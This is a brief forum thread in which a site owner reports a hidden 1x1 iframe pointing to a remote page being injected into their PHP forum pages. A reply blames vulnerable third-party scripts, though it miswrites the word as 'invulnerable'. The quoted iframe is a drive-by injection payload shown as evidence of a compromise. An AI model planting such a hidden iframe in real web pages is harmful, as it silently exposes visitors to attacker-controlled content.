I am facing issues with the site since i have made it live, i am running a forum and some PHP files.
Someone is inserting the below code on to my PHP pages..
<iframe src="http://example.com/ind.php" width="1" height="1" alt="Uw8bLlKjsi3HqXs"></iframe>

And due this this the site is not function, is this a server issue or a PHP code issue?

Looks like you are running one or maybe more invulnerable scripts and its being hacked. Check the software websites if you have 3rd party systems installed.
